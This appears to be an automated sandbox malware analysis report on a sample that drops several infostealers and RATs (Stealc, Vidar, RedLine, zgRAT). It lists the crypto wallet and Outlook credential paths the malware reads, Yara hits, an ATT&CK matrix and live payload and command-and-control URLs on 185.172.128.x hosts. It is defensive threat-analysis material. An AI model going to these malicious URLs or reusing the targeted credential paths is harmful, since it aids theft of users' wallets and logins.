Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2493025545.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3052, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 1.2.u5qk.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.5c70e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5qk.0.exe.5ca0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5qk.0.exe.5ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901eeb15.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901749f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2395167883.0000020EE543B000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3052, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 7596, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.u5qk.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5qk.0.exe.5c70e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5qk.0.exe.5ca0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5qk.0.exe.5ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6BC40B40
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB68EA0 sqlite3_clear_bindings,	1_2_6BB68EA0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC40D60 sqlite3_bind_parameter_name,	1_2_6BC40D60
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC40C40 sqlite3_bind_zeroblob,	1_2_6BC40C40
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB663C0 PR_Bind,	1_2_6BB663C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	341 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Obfuscated Files or Information	NTDS	289 System Information Discovery	Distributed Component Object Model	1 Email Collection	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	551 Security Software Discovery	SSH	11 Input Capture	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
VucRf0jboS.exe	45%	ReversingLabs	Win32.Trojan.Generic
VucRf0jboS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\nkho	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\ssfwvk	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\nkho	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ssfwvk	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\u5qk.0.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Temp\nkho	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\ssfwvk	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\u5qk.2\relay.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5qk.3.exe	4%	ReversingLabs
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\SecureClient\relay.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.indyproject.org/	0%	URL Reputation	safe
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	0%	URL Reputation	safe
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/freebl3.dll5	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Avira URL Cloud	safe
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	0%	Avira URL Cloud	safe
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	0%	Avira URL Cloud	safe
http://185.172.128.59/syncUpd.exe	100%	Avira URL Cloud	malware
185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://185.172.128.228/BroomSetup.exe	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dllg	0%	Avira URL Cloud	safe
http://185.172.128.228/ping.php?substr=two	100%	Avira URL Cloud	malware
http://185.172.128.76	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dll2	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/softokn3.dllS	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php9bc63c5c878de6304643d64e61fb8releaseccbd010d5db7d1a32561c9	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe00	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Avira URL Cloud	safe
http://185.172.128.76Z	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
iolo0.b-cdn.net	185.93.1.247	true	false	high
note.padd.cn.com	176.97.76.106	true	false	unknown
svc.iolo.com	20.157.87.45	true	false	high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown
download.iolo.net	unknown	unknown	true	unknown
westus2-2.in.applicationinsights.azure.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.172.128.228/BroomSetup.exe	false	Avira URL Cloud: safe	unknown
185.172.128.76/3cd2b41cbde8fc9c.php	true	Avira URL Cloud: safe	low
http://185.172.128.76/3cd2b41cbde8fc9c.php	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.59/syncUpd.exe	false	Avira URL Cloud: malware	unknown
http://185.172.128.228/ping.php?substr=two	false	Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/nss3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exe	false	Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true	Avira URL Cloud: safe	unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.azure.com//.default	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.vmware.com/0	run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/&	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u5qk.3.exe, 00000009.00000003.2489838469.0000000002839000.00000004.00001000.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.00000000027D6000.00000004.00001000.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.0000000002874000.00000004.00001000.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.0000000002832000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.iolo.com/support/solutions/articles/44001781185?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://www.iolo.com/company/legal/privacy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
http://185.172.128.76/15f649199f40275b/freebl3.dll5	u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.codeplex.com/CompositeWPF	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://support.iolo.com/support/solutions/articles/44001781185	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFL	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB461000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://taskscheduler.codeplex.com/H	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://scripts.sil.org/OFLX8	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80394000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dc.services.visualstudio.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
